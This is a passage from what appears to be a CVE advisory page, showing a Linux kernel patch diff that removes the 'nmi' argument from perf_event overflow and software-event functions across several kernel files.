     			     struct pt_regs *regs)
     {
    
  • arch/x86/mm/fault.c+3 3 modified
    @@ -1059,7 +1059,7 @@ do_page_fault(struct pt_regs *regs, unsigned long error_code)
     	if (unlikely(error_code & PF_RSVD))
     		pgtable_bad(regs, error_code, address);
     
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
     
     	/*
     	 * If we're in an interrupt, have no user context or are running
    @@ -1161,11 +1161,11 @@ do_page_fault(struct pt_regs *regs, unsigned long error_code)
     	if (flags & FAULT_FLAG_ALLOW_RETRY) {
     		if (fault & VM_FAULT_MAJOR) {
     			tsk->maj_flt++;
    -			perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, 0,
    +			perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1,
     				      regs, address);
     		} else {
     			tsk->min_flt++;
    -			perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, 0,
    +			perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1,
     				      regs, address);
     		}
     		if (fault & VM_FAULT_RETRY) {
    
  • include/linux/perf_event.h+8 10 modified
    @@ -682,7 +682,7 @@ enum perf_event_active_state {
     struct file;
     struct perf_sample_data;
     
    -typedef void (*perf_overflow_handler_t)(struct perf_event *, int,
    +typedef void (*perf_overflow_handler_t)(struct perf_event *,
     					struct perf_sample_data *,
     					struct pt_regs *regs);
     
    @@ -925,7 +925,6 @@ struct perf_output_handle {
     	unsigned long			size;
     	void				*addr;
     	int				page;
    -	int				nmi;
     	int				sample;
     };
     
    @@ -993,7 +992,7 @@ extern void perf_prepare_sample(struct perf_event_header *header,
     				struct perf_event *event,
     				struct pt_regs *regs);
     
    -extern int perf_event_overflow(struct perf_event *event, int nmi,
    +extern int perf_event_overflow(struct perf_event *event,
     				 struct perf_sample_data *data,
     				 struct pt_regs *regs);
     
    @@ -1012,7 +1011,7 @@ static inline int is_software_event(struct perf_event *event)
     
     extern struct jump_label_key perf_swevent_enabled[PERF_COUNT_SW_MAX];
     
    -extern void __perf_sw_event(u32, u64, int, struct pt_regs *, u64);
    +extern void __perf_sw_event(u32, u64, struct pt_regs *, u64);
     
     #ifndef perf_arch_fetch_caller_regs
     static inline void perf_arch_fetch_caller_regs(struct pt_regs *regs, unsigned long ip) { }
    @@ -1034,7 +1033,7 @@ static inline void perf_fetch_caller_regs(struct pt_regs *regs)
     }
     
     static __always_inline void
    -perf_sw_event(u32 event_id, u64 nr, int nmi, struct pt_regs *regs, u64 addr)
    +perf_sw_event(u32 event_id, u64 nr, struct pt_regs *regs, u64 addr)
     {
     	struct pt_regs hot_regs;
     
    @@ -1043,7 +1042,7 @@ perf_sw_event(u32 event_id, u64 nr, int nmi, struct pt_regs *regs, u64 addr)
     			perf_fetch_caller_regs(&hot_regs);
     			regs = &hot_regs;
     		}
    -		__perf_sw_event(event_id, nr, nmi, regs, addr);
    +		__perf_sw_event(event_id, nr, regs, addr);
     	}
     }
     
    @@ -1057,7 +1056,7 @@ static inline void perf_event_task_sched_in(struct task_struct *task)
     
     static inline void perf_event_task_sched_out(struct task_struct *task, struct task_struct *next)
     {
    -	perf_sw_event(PERF_COUNT_SW_CONTEXT_SWITCHES, 1, 1, NULL, 0);
    +	perf_sw_event(PERF_COUNT_SW_CONTEXT_SWITCHES, 1, NULL, 0);
     
     	__perf_event_task_sched_out(task, next);
     }
    @@ -1119,7 +1118,7 @@ extern void perf_bp_event(struct perf_event *event, void *data);
     
     extern int perf_output_begin(struct perf_output_handle *handle,
     			     struct perf_event *event, unsigned int size,
    -			     int nmi, int sample);
    +			     int sample);
     extern void perf_output_end(struct perf_output_handle *handle);
     extern void perf_output_copy(struct perf_output_handle *handle,
     			     const void *buf, unsigned int len);
    @@ -1143,8 +1142,7 @@ static inline int perf_event_task_disable(void)				{ return -EINVAL; }
     static inline int perf_event_task_enable(void)				{ return -EINVAL; }
     
     static inline void
    -perf_sw_event(u32 event_id, u64 nr, int nmi,
    -		     struct pt_regs *regs, u64 addr)			{ }
    +perf_sw_event(u32 event_id, u64 nr, struct pt_regs *regs, u64 addr)	{ }
     static inline void
     perf_bp_event(struct perf_event *event, void *data)			{ }
     
    
  • kernel/events/core.c+28 35 modified
    @@ -3972,7 +3972,7 @@ void perf_prepare_sample(struct perf_event_header *header,
     	}
     }
     
    -static void perf_event_output(struct perf_event *event, int nmi,
    +static void perf_event_output(struct perf_event *event,
     				struct perf_sample_data *data,
     				struct pt_regs *regs)
     {
    @@ -3984,7 +3984,7 @@ static void perf_event_output(struct perf_event *event, int nmi,
     
     	perf_prepare_sample(&header, data, event, regs);
     
    -	if (perf_output_begin(&handle, event, header.size, nmi, 1))
    +	if (perf_output_begin(&handle, event, header.size, 1))
     		goto exit;
     
     	perf_output_sample(&handle, &header, data, event);
    @@ -4024,7 +4024,7 @@ perf_event_read_event(struct perf_event *event,
     	int ret;
     
     	perf_event_header__init_id(&read_event.header, &sample, event);
    -	ret = perf_output_begin(&handle, event, read_event.header.size, 0, 0);
    +	ret = perf_output_begin(&handle, event, read_event.header.size, 0);
     	if (ret)
     		return;
     
    @@ -4067,7 +4067,7 @@ static void perf_event_task_output(struct perf_event *event,
     	perf_event_header__init_id(&task_event->event_id.header, &sample, event);
     
     	ret = perf_output_begin(&handle, event,
    -				task_event->event_id.header.size, 0, 0);
    +				task_event->event_id.header.size, 0);
     	if (ret)
     		goto out;
     
    @@ -4204,7 +4204,7 @@ static void perf_event_comm_output(struct perf_event *event,
     
     	perf_event_header__init_id(&comm_event->event_id.header, &sample, event);
     	ret = perf_output_begin(&handle, event,
    -				comm_event->event_id.header.size, 0, 0);
    +				comm_event->event_id.header.size, 0);
     
     	if (ret)
     		goto out;
    @@ -4351,7 +4351,7 @@ static void perf_event_mmap_output(struct perf_event *event,
     
     	perf_event_header__init_id(&mmap_event->event_id.header, &sample, event);
     	ret = perf_output_begin(&handle, event,
    -				mmap_event->event_id.header.size, 0, 0);
    +				mmap_event->event_id.header.size, 0);
     	if (ret)
     		goto out;
     
    @@ -4546,7 +4546,7 @@ static void perf_log_throttle(struct perf_event *event, int enable)
     	perf_event_header__init_id(&throttle_event.header, &sample, event);
     
     	ret = perf_output_begin(&handle, event,
    -				throttle_event.header.size, 1, 0);
    +				throttle_event.header.size, 0);
     	if (ret)
     		return;
     
    @@ -4559,7 +4559,7 @@ static void perf_log_throttle(struct perf_event *event, int enable)
      * Generic event overflow handling, sampling.
      */
     
    -static int __perf_event_overflow(struct perf_event *event, int nmi,
    +static int __perf_event_overflow(struct perf_event *event,
     				   int throttle, struct perf_sample_data *data,
     				   struct pt_regs *regs)
     {
    @@ -4602,34 +4602,28 @@ static int __perf_event_overflow(struct perf_event *event, int nmi,
     	if (events && atomic_dec_and_test(&event->event_limit)) {
     		ret = 1;
     		event->pending_kill = POLL_HUP;
    -		if (nmi) {
    -			event->pending_disable = 1;
    -			irq_work_queue(&event->pending);
    -		} else
    -			perf_event_disable(event);
    +		event->pending_disable = 1;
    +		irq_work_queue(&event->pending);
     	}
     
     	if (event->overflow_handler)
    -		event->overflow_handler(event, nmi, data, regs);
    +		event->overflow_handler(event, data, regs);
     	else
    -		perf_event_output(event, nmi, data, regs);
    +		perf_event_output(event, data, regs);
     
     	if (event->fasync && event->pending_kill) {
    -		if (nmi) {
    -			event->pending_wakeup = 1;
    -			irq_work_queue(&event->pending);
    -		} else
    -			perf_event_wakeup(event);
    +		event->pending_wakeup = 1;
    +		irq_work_queue(&event->pending);
     	}
     
     	return ret;
     }
     
    -int perf_event_overflow(struct perf_event *event, int nmi,
    +int perf_event_overflow(struct perf_event *event,
     			  struct perf_sample_data *data,
     			  struct pt_regs *regs)
     {
    -	return __perf_event_overflow(event, nmi, 1, data, regs);
    +	return __perf_event_overflow(event, 1, data, regs);
     }
     
     /*
    @@ -4678,7 +4672,7 @@ static u64 perf_swevent_set_period(struct perf_event *event)
     }
     
     static void perf_swevent_overflow(struct perf_event *event, u64 overflow,
    -				    int nmi, struct perf_sample_data *data,
    +				    struct perf_sample_data *data,
     				    struct pt_regs *regs)
     {
     	struct hw_perf_event *hwc = &event->hw;
    @@ -4692,7 +4686,7 @@ static void perf_swevent_overflow(struct perf_event *event, u64 overflow,
     		return;
     
     	for (; overflow; overflow--) {
    -		if (__perf_event_overflow(event, nmi, throttle,
    +		if (__perf_event_overflow(event, throttle,
     					    data, regs)) {
     			/*
     			 * We inhibit the overflow from happening when
    @@ -4705,7 +4699,7 @@ static void perf_swevent_overflow(struct perf_event *event, u64 overflow,
     }
     
     static void perf_swevent_event(struct perf_event *event, u64 nr,
    -			       int nmi, struct perf_sample_data *data,
    +			       struct perf_sample_data *data,
     			       struct pt_regs *regs)
     {
     	struct hw_perf_event *hwc = &event->hw;
    @@ -4719,12 +4713,12 @@ static void perf_swevent_event(struct perf_event *event, u64 nr,
     		return;
     
     	if (nr == 1 && hwc->sample_period == 1 && !event->attr.freq)
    -		return perf_swevent_overflow(event, 1, nmi, data, regs);
    +		return perf_swevent_overflow(event, 1, data, regs);
     
     	if (local64_add_negative(nr, &hwc->period_left))
     		return;
     
    -	perf_swevent_overflow(event, 0, nmi, data, regs);
    +	perf_swevent_overflow(event, 0, data, regs);
     }
     
     static int perf_exclude_event(struct perf_event *event,
    @@ -4812,7 +4806,7 @@ find_swevent_head(struct swevent_htable *swhash, struct perf_event *event)
     }
     
     static void do_perf_sw_event(enum perf_type_id type, u32 event_id,
    -				    u64 nr, int nmi,
    +				    u64 nr,
     				    struct perf_sample_data *data,
     				    struct pt_regs *regs)
     {
    @@ -4828,7 +4822,7 @@ static void do_perf_sw_event(enum perf_type_id type, u32 event_id,
     
     	hlist_for_each_entry_rcu(event, node, head, hlist_entry) {
     		if (perf_swevent_match(event, type, event_id, data, regs))
    -			perf_swevent_event(event, nr, nmi, data, regs);
    +			perf_swevent_event(event, nr, data, regs);
     	}
     end:
     	rcu_read_unlock();
    @@ -4849,8 +4843,7 @@ inline void perf_swevent_put_recursion_context(int rctx)
     	put_recursion_context(swhash->recursion, rctx);
     }
     
    -void __perf_sw_event(u32 event_id, u64 nr, int nmi,
    -			    struct pt_regs *regs, u64 addr)
    +void __perf_sw_event(u32 event_id, u64 nr, struct pt_regs *regs, u64 addr)
     {
     	struct perf_sample_data data;
     	int rctx;
    @@ -4862,7 +4855,7 @@ void __perf_sw_event(u32 event_id, u64 nr, int nmi,
     
     	perf_sample_data_init(&data, addr);
     
    -	do_perf_sw_event(PERF_TYPE_SOFTWARE, event_id, nr, nmi, &data, regs);
    +	do_perf_sw_event(PERF_TYPE_SOFTWARE, event_id, nr, &data, regs);
     
     	perf_swevent_put_recursion_context(rctx);
     	preempt_enable_notrace();
    @@ -5110,7 +5103,7 @@ void perf_tp_event(u64 addr, u64 count, void *record, int entry_size,
     
     	hlist_for_each_entry_rcu(event, node, head, hlist_entry) {
     		if (perf_tp_event_match(event, &data, regs))
    -			perf_swevent_event(event, count, 1, &data, regs);
    +			perf_swevent_event(event, count, &data, regs);
     	}
     
     	perf_swevent_put_recursion_context(rctx);
    @@ -5203,7 +5196,7 @@ void perf_bp_event(struct perf_event *bp, void *data)
     	perf_sample_data_init(&sample, bp->attr.bp_addr);
     
     	if (!bp->hw.state && !perf_exclude_event(bp, regs))
    -		perf_swevent_event(bp, 1, 1, &sample, regs);
    +		perf_swevent_event(bp, 1, &sample, regs);
     }
     #endif
     
    @@ -5232,7 +5225,7 @@ static enum hrtimer_restart perf_swevent_hrtimer(struct hrtimer *hrtimer)
     
     	if (regs && !perf_exclude_event(event, regs)) {
     		if (!(event->attr.exclude_idle && current->pid == 0))
    -			if (perf_event_overflow(event, 0, &data, regs))
    +			if (perf_event_overflow(event, &data, regs))
     				ret = HRTIMER_NORESTART;
     	}
     
    
  • kernel/events/internal.h+0 1 modified
    @@ -27,7 +27,6 @@ struct ring_buffer {
     	void				*data_pages[0];
     };
     
    -
     extern void rb_free(struct ring_buffer *rb);
     extern struct ring_buffer *
     rb_alloc(int nr_pages, long watermark, int cpu, int flags);
    
  • kernel/events/ring_buffer.c+3 7 modified
    @@ -38,11 +38,8 @@ static void perf_output_wakeup(struct perf_output_handle *handle)
     {
     	atomic_set(&handle->rb->poll, POLL_IN);
     
    -	if (handle->nmi) {
    -		handle->event->pending_wakeup = 1;
    -		irq_work_queue(&handle->event->pending);
    -	} else
    -		perf_event_wakeup(handle->event);
    +	handle->event->pending_wakeup = 1;
    +	irq_work_queue(&handle->event->pending);
     }
     
     /*
    @@ -102,7 +99,7 @@ static void perf_output_put_handle(struct perf_output_handle *handle)
     
     int perf_output_begin(struct perf_output_handle *handle,
     		      struct perf_event *event, unsigned int size,
    -		      int nmi, int sample)
    +		      int sample)
     {
     	struct ring_buffer *rb;
     	unsigned long tail, offset, head;
    @@ -127,7 +124,6 @@ int perf_output_begin(struct perf_output_handle *handle,
     
     	handle->rb	= rb;
     	handle->event	= event;
    -	handle->nmi	= nmi;
     	handle->sample	= sample;
     
     	if (!rb->nr_pages)
    
  • kernel/sched.c+1 1 modified
    @@ -2220,7 +2220,7 @@ void set_task_cpu(struct task_struct *p, unsigned int new_cpu)
     
     	if (task_cpu(p) != new_cpu) {
     		p->se.nr_migrations++;
    -		perf_sw_event(PERF_COUNT_SW_CPU_MIGRATIONS, 1, 1, NULL, 0);
    +		perf_sw_event(PERF_COUNT_SW_CPU_MIGRATIONS, 1, NULL, 0);
     	}
     
     	__set_task_cpu(p, new_cpu);
    
  • kernel/watchdog.c+1 1 modified
    @@ -211,7 +211,7 @@ static struct perf_event_attr wd_hw_attr = {
     };
     
     /* Callback function for perf event subsystem */
    -static void watchdog_overflow_callback(struct perf_event *event, int nmi,
    +static void watchdog_overflow_callback(struct perf_event *event,
     		 struct perf_sample_data *data,
     		 struct pt_regs *regs)
     {
    
  • samples/hw_breakpoint/data_breakpoint.c+1 1 modified
    @@ -41,7 +41,7 @@ module_param_string(ksym, ksym_name, KSYM_NAME_LEN, S_IRUGO);
     MODULE_PARM_DESC(ksym, "Kernel symbol to monitor; this module will report any"
     			" write operations on the kernel symbol");
     
    -static void sample_hbp_handler(struct perf_event *bp, int nmi,
    +static void sample_hbp_handler(struct perf_event *bp,
     			       struct perf_sample_data *data,
     			       struct pt_regs *regs)
     {
    

Vulnerability mechanics

Generated by null/stub on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

0

No linked articles in our index yet.